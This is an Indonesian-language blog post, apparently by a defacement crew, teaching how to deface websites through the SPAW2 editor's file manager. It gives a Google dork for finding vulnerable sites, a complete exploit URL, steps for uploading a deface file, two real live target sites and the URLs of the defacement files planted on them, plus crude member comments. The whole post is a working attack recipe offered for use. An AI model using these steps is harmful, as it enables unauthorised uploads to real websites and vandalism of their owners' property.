1. HP/PC
2. Kuota (wajib)
3. Jembud (wajib)
4. Dork :
** inurl:"spaw2/upload/files/"
5. Script deface.
** ext : .txt / .html
6. Exploit :
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
Langkah-langkah :
1. Dorking lah njink kek biasa.
2. Jika udah nemu masukkan exploit nya, seperti dibawah.
www.xnxx.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
atau
www.xnxx.com/[path]/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
"vuln"
3. Cari tulisan image, pencet, rubah jadi file.
"pilih Files"
4. Kemudia pilih file, upload.
5. Cari filenya, cari tulisan "download file"
 |
6. Pencet tuh, auto ke tab baru..
Udah deh, kelar..
Live Target
1. http://www.leanimages.net/admin/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
2. https://www.fem.gr/input/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
Hasil?
1. https://www.fem.gr/input/spaw2/uploads/files/duar.txt
2. https://www.leanimages.net/admin/spaw2/uploads/files/vvibu.html
#LightCyberIndo
#penulis_./Misetya
5 Comments
test :v
ReplyDeleteWoy jembud, nick gua mana puki
ReplyDeleteini ada nik lu
Delete. https://www.leanimages.net/admin/spaw2/uploads/files/vvibu.html
Sekali Kali Materi Coli Dong Bang ./Frin4 Id.
ReplyDeleteyg mau visit siapa?
Delete